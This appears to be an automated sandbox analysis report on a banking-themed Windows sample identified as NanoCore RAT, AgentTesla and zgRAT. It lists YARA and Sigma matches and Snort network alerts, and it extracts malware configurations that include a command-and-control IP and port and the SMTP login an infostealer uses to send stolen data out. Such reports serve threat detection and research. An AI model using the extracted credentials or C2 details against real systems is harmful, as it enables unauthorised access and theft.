0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x326a2:$s10: logins 0x32109:$s11: credential 0x2e6e6:$g1: get_Clipboard 0x2e6f4:$g2: get_Keyboard 0x2e701:$g3: get_Password 0x2f9e4:$g4: get_CtrlKeyDown 0x2f9f4:$g5: get_ShiftKeyDown 0x2fa05:$g6: get_AltKeyDown
0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x326a2:$s10: logins 0x32109:$s11: credential 0x2e6e6:$g1: get_Clipboard 0x2e6f4:$g2: get_Keyboard 0x2e701:$g3: get_Password 0x2f9e4:$g4: get_CtrlKeyDown 0x2f9f4:$g5: get_ShiftKeyDown 0x2fa05:$g6: get_AltKeyDown
12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d08f:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0bc:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d08f:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e16a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0a9:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0x145ae:$x2: NanoCore.ClientPlugin 0x2d05a:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0x145e3:$x3: NanoCore.ClientPluginHost 0x2d08f:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0x145a2:$i2: IClientData 0x2d04e:$i2: IClientData 0xe29:$i3: IClientNetwork 0x145c4:$i3: IClientNetwork 0x2d070:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0x145d3:$i5: IClientDataHost 0x2d07f:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0x145fd:$i6: IClientLoggingHost 0x2d0a9:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost
12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d045:$a: NanoCore 0x2d05a:$a: NanoCore 0x2d08f:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce01:$b: ClientPlugin 0x2ce1c:$b: ClientPlugin
12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c30:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c5d:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c30:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d0b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c4a:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0x23bfb:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0x23c30:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0x23bef:$i2: IClientData 0xb165:$i3: IClientNetwork 0x23c11:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0x23c20:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0x23c4a:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0x23c5d:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0x23c70:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0x23c7e:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0x23c9a:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin
0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0xb165:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin 0xb158:$s1: ClientPlugin 0x10179:$s6: get_ClientSettings
0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x101b7:$s5: IClientLoggingHost
0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
0.2.OCBC_BAN.EXE.2cd8784.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q 0x10efc:$j: #=q 0x10f18:$j: #=q
12.2.OCBC_BAN.EXE.5ba0000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.5ba0000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.5ba0000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.OCBC_BAN.EXE.5ba0000.9.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
12.0.OCBC_BAN.EXE.400000.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.0.OCBC_BAN.EXE.400000.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.0.OCBC_BAN.EXE.400000.12.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.0.OCBC_BAN.EXE.400000.12.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
12.0.OCBC_BAN.EXE.400000.12.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x326a2:$s10: logins 0x32109:$s11: credential 0x2e6e6:$g1: get_Clipboard 0x2e6f4:$g2: get_Keyboard 0x2e701:$g3: get_Password 0x2f9e4:$g4: get_CtrlKeyDown 0x2f9f4:$g5: get_ShiftKeyDown 0x2fa05:$g6: get_AltKeyDown
0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x381ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x381ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3bd1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x37f25:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x381ad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x397e6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x397da:$s2: FileCommand 0x1266b:$s3: PipeExists 0x3a68b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x40442:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x381d7:$s5: IClientLoggingHost
0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x37f15:$x1: NanoCore Client 0x37f25:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x3816d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x381ad:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x38162:$i1: IClientApp 0x10163:$i2: IClientData 0x38183:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x3818f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x3819e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x381c7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x381d7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost
0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x37f15:$a: NanoCore 0x37f25:$a: NanoCore 0x38159:$a: NanoCore 0x3816d:$a: NanoCore 0x381ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x37f74:$b: ClientPlugin 0x38176:$b: ClientPlugin 0x381b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x3809b:$c: ProjectData 0x10a82:$d: DESCrypto 0x38aa2:$d: DESCrypto 0x1844e:$e: KeepAlive
12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28259:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x28286:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28259:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29334:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28273:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0x28224:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0x28259:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0x28218:$i2: IClientData 0xf78e:$i3: IClientNetwork 0x2823a:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0x28249:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0x28273:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0x28286:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0x28299:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0x282a7:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0x282c3:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin
12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
12.2.OCBC_BAN.EXE.2a39560.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x1dae4:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
0.3.OCBC_BAN.EXE.985c050.2.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xe18c8:$s1: file:/// 0xe17d8:$s2: {11111-22222-10009-11112} 0xe1858:$s3: {11111-22222-50001-00000} 0xda792:$s4: get_Module 0xcedf7:$s5: Reverse 0xcc86b:$s6: BlockCopy 0xd0013:$s7: ReadByte 0xe18da:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.3.OCBC_BAN.EXE.985c050.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0xe36c8:$s1: file:/// 0xe35d8:$s2: {11111-22222-10009-11112} 0xe3658:$s3: {11111-22222-50001-00000} 0xdc592:$s4: get_Module 0xd0bf7:$s5: Reverse 0xce66b:$s6: BlockCopy 0xd1e13:$s7: ReadByte 0xe36da:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
Click to see the 126 entries

Sigma Signatures

AV Detection

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\OCBC_BAN.EXE, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\OCBC_BAN.EXE, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Stealing of Sensitive Information

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\OCBC_BAN.EXE, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality

Sigma detected: NanoCore

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\OCBC_BAN.EXE, ProcessId: 3524, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Snort Signatures

ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) - Source IP: 103.8.79.204 - Destination IP: 192.168.2.6

Timestamp:	103.8.79.204192.168.2.680497372848901 05/10/22-14:47:14.568526
SID:	2848901
Source Port:	80
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.6 - Destination IP: 200.40.119.50

Timestamp:	192.168.2.6200.40.119.50497865872030171 05/10/22-14:48:16.817585
SID:	2030171
Source Port:	49786
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "49b4bf8f-6f20-4306-8d82-ae70effc", "Group": "Default", "Domain1": "23.105.131.196", "Domain2": "127.0.0.1", "Port": 9070, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "info@elparque.com.uy", "Password": "info919", "Host": "mail.elparque.com.uy"}

Multi AV Scanner detection for submitted file

Source: OCBC_BAN.EXE

ReversingLabs: Detection: 31%

Antivirus detection for URL or domain

